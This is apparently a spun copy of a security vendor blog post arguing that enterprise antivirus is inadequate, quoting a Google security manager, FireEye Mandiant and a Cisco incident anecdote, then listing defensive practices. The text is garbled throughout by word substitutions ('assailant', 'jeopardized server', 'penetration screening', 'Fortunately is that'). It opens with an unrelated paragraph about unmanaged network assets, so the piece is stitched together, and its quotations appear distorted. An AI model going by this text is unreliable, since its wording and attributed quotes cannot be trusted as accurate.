BYOD, shadow IT, IoT, virtualization, and Gartner’s newly-coined BYOT imply more and more assets on to the organization network. Unfortunately, much of these assets are unknown or unmanaged by IT. These unmanaged assets present serious security holes. Eliminating these un-managed assets from the network – which are much more most likely to be “patient zero” – or bringing them up to business security standards significantly reduces a company’s attack surface area and general risk. Fortunately is that there are solutions that can provide constant, passive discovery of un-managed assets.


Don’t Just Rely On Your Enterprise Antivirus – Charles Leaver

Written By Dr Al Hartmann And Presented By Charles Leaver Ziften CEO


Dwindling Efficiency of Business Anti-virus?

Google Security Master Labels Antivirus Apps As Inadequate ‘Magic’.

At the current Kiwicon hacking conference in Wellington, New Zealand, Google’s Platform Integrity team manager Darren Bilby preached cyber-security heresy. Charged with investigation of highly sophisticated attacks, consisting of the 2009 Operation Aurora project, Bilby lumped organization anti-virus into a collection of inadequate tools set up to tick a compliance check box, but at the expenditure of real security:

We need to stop investing in those things we have shown are not effective… Anti-virus does some useful things, however in reality, it is more like a canary in a coal mine. It is worse than that. It’s like we are loafing around the dead canary stating ‘Thank god it inhaled all the toxic gas.

Google security experts aren’t the very first to weigh in against organization antivirus, or to draw uncomplimentary analogies, in this case to a dead canary.

Another highly skilled security group, FireEye Mandiant, compared static defenses such as business anti-virus to that infamously failed World War II defense, the Maginot Line:

Like the Maginot Line, today’s cyber defenses are quick becoming an antique in today’s hazard landscape. Organizations invest billions of dollars each year on IT security. However hackers are easily outflanking these defenses with smart, fast moving attacks.

An example of this was given by a Cisco managed security services executive speaking at a conference in Poland. Their team had actually identified anomalous activity on one of their business customer’s networks, and reported the presumed server compromise to the customer. To the Cisco team’s awe, the customer simply ran an anti-virus scan on the server, found no detections, and positioned it back into service. Frightened, the Cisco group conferenced in the customer to their monitoring console and had the ability to show the assailant carrying out a live remote session at that very moment, total with typing mistakes and reissue of commands to the jeopardized server. Finally encouraged, the customer took the server down and completely re-imaged it – the organization antivirus had been an useless diversion – it had actually not served the customer and it had actually not deterred the cyber attack.

So Is It Time to Get Rid Of Enterprise Antivirus Now?

I am not yet ready to declare an end to the age of business antivirus. However I know that businesses have to buy detection and response abilities to match conventional antivirus. However increasingly I wonder who is complementing whom.

Skilled targeted hackers will always successfully evade antivirus defenses, so versus your greatest cyber dangers, enterprise anti-virus is basically ineffective. As Darren Bilby specified, it does do some beneficial things, but it does not supply the endpoint defense you require. So, do not let it distract you from the highest concern cyber-security financial investments, and don’t let it distract you from security measures that do essentially help.

Shown cyber defense steps include:

Setup hardening of networks and endpoints.

Identity management with strong authentication.

Application controls.

Constant network and endpoint tracking, consistent vigilance.

Strong encryption and data security.

Personnel education and training.

Continuous hazard re-assessment, penetration screening, red/blue teaming.

In contrast to Bilby’s criticism of business anti-virus, none of the above bullets are ‘magic’. They are simply the ongoing effort of adequate enterprise cyber-security.